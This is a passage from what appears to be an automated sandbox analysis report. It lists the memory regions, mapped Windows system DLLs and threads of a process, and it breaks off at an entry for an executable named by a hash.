0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 416 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 417 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 418 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 419 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 420 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 421 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 422 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 423 start_va = 0x6c8b0000 end_va = 0x6c936fff monitored = 0 entry_point = 0x6c91dbc0 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 424 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 425 start_va = 0x5f0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 426 start_va = 0x6c770000 end_va = 0x6c8aefff monitored = 0 entry_point = 0x6c79d880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 427 start_va = 0x72700000 end_va = 0x72721fff monitored = 0 entry_point = 0x727091f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 428 start_va = 0x6c710000 end_va = 0x6c763fff monitored = 0 entry_point = 0x6c7410d0 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\SysWOW64\\Faultrep.dll" (normalized: "c:\\windows\\syswow64\\faultrep.dll") Region: id = 429 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 430 start_va = 0x70000000 end_va = 0x70020fff monitored = 0 entry_point = 0x7001a910 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\SysWOW64\\dbgcore.dll" (normalized: "c:\\windows\\syswow64\\dbgcore.dll") Region: id = 431 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 432 start_va = 0x630000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 433 start_va = 0x6c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 434 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 435 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 436 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 437 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 438 start_va = 0x6c0000 end_va = 0x847fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 439 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 440 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 441 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 442 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 443 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 444 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 445 start_va = 0x630000 end_va = 0x67efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 446 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 447 start_va = 0x4940000 end_va = 0x4ac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004940000" filename = "" Region: id = 448 start_va = 0x4ad0000 end_va = 0x5ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 449 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 450 start_va = 0x5ed0000 end_va = 0x602ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ed0000" filename = "" Region: id = 451 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 452 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 453 start_va = 0x690000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 454 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 455 start_va = 0x690000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 456 start_va = 0x6030000 end_va = 0x682ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006030000" filename = "" Region: id = 457 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 458 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 459 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 460 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 461 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 462 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 463 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 464 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 465 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 466 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 467 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 468 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 469 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 470 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 471 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 472 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 473 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 474 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 475 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 476 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 477 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 478 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 479 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 480 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 481 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 482 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 483 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 484 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 485 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 486 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 487 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 488 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 489 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 490 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 491 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 492 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 493 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 494 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 495 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 496 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 497 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 498 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 499 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 500 start_va = 0x690000 end_va = 0x69afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 501 start_va = 0x690000 end_va = 0x691fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "faultrep.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\faultrep.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\faultrep.dll.mui") Region: id = 502 start_va = 0x5f10000 end_va = 0x5f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f10000" filename = "" Region: id = 503 start_va = 0x6020000 end_va = 0x602ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006020000" filename = "" Region: id = 504 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 505 start_va = 0x6bf60000 end_va = 0x6c37dfff monitored = 0 entry_point = 0x6c05ee80 region_type = mapped_file name = "dbgeng.dll" filename = "\\Windows\\SysWOW64\\dbgeng.dll" (normalized: "c:\\windows\\syswow64\\dbgeng.dll") Region: id = 506 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 507 start_va = 0x6cab0000 end_va = 0x6cb1ffff monitored = 0 entry_point = 0x6cb04b90 region_type = mapped_file name = "dbgmodel.dll" filename = "\\Windows\\SysWOW64\\DbgModel.dll" (normalized: "c:\\windows\\syswow64\\dbgmodel.dll") Region: id = 508 start_va = 0x70040000 end_va = 0x7006cfff monitored = 0 entry_point = 0x70052b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 509 start_va = 0x6030000 end_va = 0x6119fff monitored = 0 entry_point = 0x606d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 510 start_va = 0x6cc40000 end_va = 0x6cc49fff monitored = 0 entry_point = 0x6cc43200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 511 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 512 start_va = 0x70030000 end_va = 0x70037fff monitored = 0 entry_point = 0x700317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 513 start_va = 0x6030000 end_va = 0x612ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006030000" filename = "" Region: id = 514 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 515 start_va = 0x6130000 end_va = 0x6466fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 516 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 517 start_va = 0x6a0000 end_va = 0x6a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 518 start_va = 0x6a0000 end_va = 0x6a5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 519 start_va = 0x6a0000 end_va = 0x6a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 520 start_va = 0x6470000 end_va = 0x656ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006470000" filename = "" Region: id = 521 start_va = 0x6a0000 end_va = 0x6a9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 522 start_va = 0x6a0000 end_va = 0x6abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 523 start_va = 0x6a0000 end_va = 0x6adfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 524 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 525 start_va = 0x850000 end_va = 0x861fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 526 start_va = 0x850000 end_va = 0x863fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 527 start_va = 0x850000 end_va = 0x865fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 528 start_va = 0x850000 end_va = 0x867fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 529 start_va = 0x850000 end_va = 0x869fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 530 start_va = 0x850000 end_va = 0x86bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 531 start_va = 0x850000 end_va = 0x86dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 532 start_va = 0x850000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 533 start_va = 0x850000 end_va = 0x871fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 534 start_va = 0x6570000 end_va = 0x666ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006570000" filename = "" Region: id = 535 start_va = 0x6670000 end_va = 0x674ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 536 start_va = 0x6750000 end_va = 0x6816fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006750000" filename = "" Region: id = 537 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 538 start_va = 0x850000 end_va = 0x852fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wer.dll.mui") Region: id = 539 start_va = 0x860000 end_va = 0x863fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 540 start_va = 0x6750000 end_va = 0x6f4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006750000" filename = "" Region: id = 541 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 542 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 543 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 544 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 545 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 546 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 547 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 548 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 549 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 550 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 551 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 552 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 553 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 554 start_va = 0x6750000 end_va = 0x684ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006750000" filename = "" Region: id = 555 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 556 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 557 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 558 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 559 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 560 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 561 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 562 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 563 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 564 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 565 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 566 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 567 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 568 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 569 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 570 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 571 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 572 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 573 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 574 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 575 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 576 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 577 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 578 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 579 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 580 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 581 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 582 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 583 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 584 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 585 start_va = 0x870000 end_va = 0x87afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Thread: id = 9 os_tid = 0x13c8 Thread: id = 10 os_tid = 0xf48 Thread: id = 11 os_tid = 0x134c Thread: id = 12 os_tid = 0x4e0 Process: id = "3" image_name = "f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" page_root = "0x6f940000" os_pid = "0x944" os_integrity_level = "0x3000" os_privileges = 